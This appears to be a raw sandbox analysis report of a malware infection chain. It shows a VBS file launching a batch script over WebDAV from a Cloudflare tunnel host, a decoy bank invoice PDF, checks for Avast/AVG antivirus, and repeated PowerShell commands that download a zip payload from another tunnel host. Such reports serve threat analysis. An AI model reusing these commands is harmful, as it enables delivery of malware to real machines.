PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2808	1992	chrome.exe	32
PID 1992 wrote to memory of 2832	1992	chrome.exe	33
PID 1992 wrote to memory of 2832	1992	chrome.exe	33
PID 1992 wrote to memory of 2832	1992	chrome.exe	33
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34
PID 1992 wrote to memory of 2804	1992	chrome.exe	34

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://ni-olympic-forests-invoice.trycloudflare.com
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6659758,0x7fef6659768,0x7fef6659778
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:2
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1392 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:2804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2220 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:2768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2228 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1596 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:2
  2⤵
  PID:1600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3304 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3204 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:2632
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\tat.vbs"
  2⤵
  PID:2816
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c \\ni-olympic-forests-invoice.trycloudflare.com@SSL\DavWWWRoot\voi.bat
    3⤵
    PID:2916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3684 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3948 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2244 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:2104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3908 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3876 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4128 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4144 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4280 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4148 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4292 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:8
  2⤵
  PID:1856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4308 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4364 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4268 --field-trial-handle=1368,i,5507734377536650708,4055626679090912557,131072 /prefetch:1
  2⤵
  PID:3064

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3064

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1644

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2408

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c
1⤵
PID:912

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Documents\voi.bat" "
1⤵
PID:1404
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2156
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3064
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:930823 /prefetch:2
    3⤵
    PID:2008
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1956
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1956 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:108
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:2980
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:2116
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:2612
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Documents\voi.bat"
1⤵
PID:2432
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2276
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2276 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2568
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:3060
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3060 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2532
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:2748
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:1080
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:2172
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:1852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Documents\voi.bat"
1⤵
PID:2540
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2620
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2620 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:684
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.bankbsu.ch/dam/jcr:72a8b29f-cccb-4e0f-9007-49b7e1773910/Factsheet-Unternehmen_QR-Rechnung.pdf
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2696
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2696 CREDAT:275457 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1000
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2696 CREDAT:996360 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1080
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2696 CREDAT:930823 /prefetch:2
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1628
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq AvastUI.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:1540
- C:\Windows\system32\find.exe
  find /i "AvastUI.exe"
  2⤵
  PID:3020
- C:\Windows\system32\tasklist.exe
  tasklist /FI "IMAGENAME eq avgui.exe"
  2⤵
  - Enumerates processes with tasklist
  PID:2880
- C:\Windows\system32\find.exe
  find /i "avgui.exe"
  2⤵
  PID:848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ready-bathroom-carter-membrane.trycloudflare.com/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
  2⤵
